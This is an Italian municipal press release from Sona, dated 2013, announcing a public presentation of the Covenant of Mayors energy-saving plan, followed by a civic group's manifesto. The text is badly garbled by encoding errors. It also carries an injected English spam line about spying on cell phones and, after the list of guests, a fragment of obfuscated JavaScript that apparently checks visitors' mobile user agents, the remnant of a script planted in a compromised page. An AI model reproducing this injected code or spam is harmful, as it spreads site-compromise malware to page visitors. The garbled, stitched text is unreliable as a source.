Il Comune in prima linea nelle politiche ambientali e nel risparmio energetico.

COMUNICATO STAMPAAi??Ai??

Sona, 30 agosto 2013

Il Comune in prima linea nelle politiche ambientali e nel risparmio energetico.

Presentazione del Patto dei Sindaci alla cittadinanza.

Il 9 settembre alle 20.30, nella Sala Consiliare del Comune di Sona, l’amministrazione presenterAi?? il Patto dei Sindaci.

Il progetto aveva visto il suo avvio formale con la precedente amministrazione del Comune di Sona attraverso la Delibera nAi?? 38 del 16 giugno 2011. A questa prima azione non erano perA? seguite tutte le altre fondamentali iniziative per rendere concreto il Patto dei Sindaci, rischiando cosAi?? di perdere i finanziamenti pubblici previsti.

L’attuale amministrazione, con il diretto coinvolgimento del sindaco Gianluigi Mazzi e dell’assessore all’ambiente Gianfranco Dalla Valentina, e grazie anche alle numerose competenze interne alla nuova amministrazione, ha scelto di portare avanti il Progetto intensificando l’azione e producendo tutte quelle azioni necessarie a concretizzare il piano di risparmio energetico.

ai???Non potevamo perdere quest’opportunitAi?? unica e soprattutto non potevamo non prenderci questa responsabilitAi?? che, sono certo, porterAi?? miglioramenti per tutta la nostra comunitAi??ai???, cosAi?? parla l’assessore all’ambiente Dalla Valentina che ricorda anche come le politiche ambientali fossero un importante punto di forza del programma politico dell’attuale maggioranza.

But most of those required either some sleight of hand or a little extra time, and spy on cell phone made it extremely annoying to do time and time again.

Il progetto Patto dei Sindaci si inserisce all’interno delle politiche della ComunitAi?? Europea che mirano a ridurre le emissioni di gas serra, aumentare la percentuale di energia rinnovabile e incrementare i livelli di efficienza energetica.

Anche il sindaco Gianluigi Mazzi tiene molto all’iniziativa che, dice, ai???PorterAi?? vantaggi a vari livelli, economici, ambientali, energetici. Un’iniziativa che amo molto perchAi?? rende l’azione politica veramente partecipata e concreta. La nostra capacitAi?? di velocizzare le decisioni e le azioni dipende anche dalle numerose competenze all’interno delle nostre liste civiche, della Giunta e dei Consiglieri. Di questo sono molto orgoglioso.ai???

Alla serata parteciperanno gli amministratori di Sona, Giampaolo Fusato – Coordinatore dellaRegione Veneto come Struttura di supporto per il Patto dei Sindaci, Paolo Bellotti – consigliere di maggioranza che ha seguito il progetto e Emanuele Vendramin – esperto esterno per la preparazione del Patto dei Sindaci. 0|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){

Comments are closed.

Un nuovo futuro perSona

Ci accomuna un bisogno: quello di creare un nuovo modo di appartenere alla comunità.
Una strada concreta fatta di conoscenza, esperienza e analisi, elementi necessari allo sviluppo di nuove proposte solide e realizzabili.

Ci accomuna un forte senso di appartenenza a questa comunità che ci ha sempre visto coinvolti in prima persona in attività di interesse sociale e politico.
Attività che ci hanno preparato e motivato nel voler tradurre in realtà amministrativa un progetto libero dalle tattiche e dalle strategia di partito.

Ci accomuna l’esperienza e la competenza nei diversi settori stimolo per una nuova amministrazione basata su una programmazione attenta dei bisogni quotidiani ed essenziali dei cittadini; sull’ottimizzazione e la valorizzazione delle risorse e sull’identificazione di un programma di sviluppo del territorio.

Ci accomuna la voglia di fare, di provare a creare un futuro che è nostro e dei nostri figli, senza interessi, ma con lo spirito di servizio tipico del volontariato.

Ci muove la speranza di coinvolgere chi, come noi, ha voglia di rompere gli schemi della vecchia guardia politica e vuole rinnovare Sona e e sue frazioni per davvero.